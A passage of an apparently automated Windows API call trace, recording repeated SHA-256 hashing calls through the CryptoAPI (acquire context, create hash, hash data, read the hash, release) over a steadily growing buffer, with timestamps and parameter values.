hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.888] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320610, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320610, pdwDataLen=0x12e8b8) returned 1 [0230.888] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.888] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.888] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.888] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.888] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0230.888] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.888] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320640, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320640, pdwDataLen=0x12e8b8) returned 1 [0230.888] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.888] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.888] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.889] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.889] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0230.889] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.889] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320670, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320670, pdwDataLen=0x12e8b8) returned 1 [0230.889] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.889] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.889] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.889] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.889] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0230.889] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.889] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3206a0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3206a0, pdwDataLen=0x12e8b8) returned 1 [0230.889] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.889] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.889] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.890] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.890] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0230.890] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.890] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3206d0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3206d0, pdwDataLen=0x12e8b8) returned 1 [0230.890] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.890] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.890] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.890] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.890] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0230.890] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.890] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320700, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320700, pdwDataLen=0x12e8b8) returned 1 [0230.890] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.890] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.890] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.891] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.891] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0230.891] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.891] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320730, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320730, pdwDataLen=0x12e8b8) returned 1 [0230.891] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.891] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.891] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.891] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.891] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0230.891] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.891] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320760, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320760, pdwDataLen=0x12e8b8) returned 1 [0230.891] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.891] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.891] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.892] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.892] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0230.892] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.892] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320790, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320790, pdwDataLen=0x12e8b8) returned 1 [0230.892] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.892] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.892] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.892] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.892] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0230.892] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.892] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3207c0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3207c0, pdwDataLen=0x12e8b8) returned 1 [0230.892] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.892] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.892] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.893] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.893] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0230.893] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.893] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3207f0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3207f0, pdwDataLen=0x12e8b8) returned 1 [0230.893] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.893] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.893] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.893] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.893] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0230.893] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.893] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320820, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320820, pdwDataLen=0x12e8b8) returned 1 [0230.893] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.893] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.893] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.894] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.894] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0230.894] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.894] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320850, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320850, pdwDataLen=0x12e8b8) returned 1 [0230.894] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.894] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.894] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.894] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.894] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0230.894] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.895] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320880, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320880, pdwDataLen=0x12e8b8) returned 1 [0230.895] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.895] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.895] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.895] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.895] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0230.895] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.895] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3208b0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3208b0, pdwDataLen=0x12e8b8) returned 1 [0230.895] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.895] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.895] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.896] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.896] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0230.896] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.896] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3208e0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3208e0, pdwDataLen=0x12e8b8) returned 1 [0230.896] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.896] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.896] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.896] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.896] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0230.896] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.896] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320910, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320910, pdwDataLen=0x12e8b8) returned 1 [0230.896] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.896] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.896] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.897] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.897] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0230.897] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.897] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320940, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320940, pdwDataLen=0x12e8b8) returned 1 [0230.897] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.897] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.897] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.897] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.897] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0230.897] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.897] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320970, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320970, pdwDataLen=0x12e8b8) returned 1 [0230.897] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.897] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.897] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.898] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.898] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0230.898] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.898] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3209a0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3209a0, pdwDataLen=0x12e8b8) returned 1 [0230.898] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.898] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.898] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.898] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.898] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0230.898] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.898] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3209d0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3209d0, pdwDataLen=0x12e8b8) returned 1 [0230.898] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.898] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.898] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.899] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.899] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0230.899] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.899] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320a00, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320a00, pdwDataLen=0x12e8b8) returned 1 [0230.899] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.899] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.899] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.899] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.899] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0230.899] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.899] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320a30, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320a30, pdwDataLen=0x12e8b8) returned 1 [0230.899] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.899] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.899] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.900] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.900] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0230.900] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.900] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320a60, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320a60, pdwDataLen=0x12e8b8) returned 1 [0230.900] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.900] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.900] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.900] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.900] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0230.900] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.900] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320a90, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320a90, pdwDataLen=0x12e8b8) returned 1 [0230.900] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.900] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.901] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.901] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.901] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0230.901] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.901] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320ac0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320ac0, pdwDataLen=0x12e8b8) returned 1 [0230.901] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.901] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.901] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.902] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.902] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0230.902] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.902] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320af0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320af0, pdwDataLen=0x12e8b8) returned 1 [0230.902] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.902] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.902] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.902] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.902] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xf40, dwFlags=0x0) returned 1 [0230.902] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.903] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320b20, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320b20, pdwDataLen=0x12e8b8) returned 1 [0230.903] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.903] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.903] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.903] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.903] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xf60, dwFlags=0x0) returned 1 [0230.903] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.903] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, 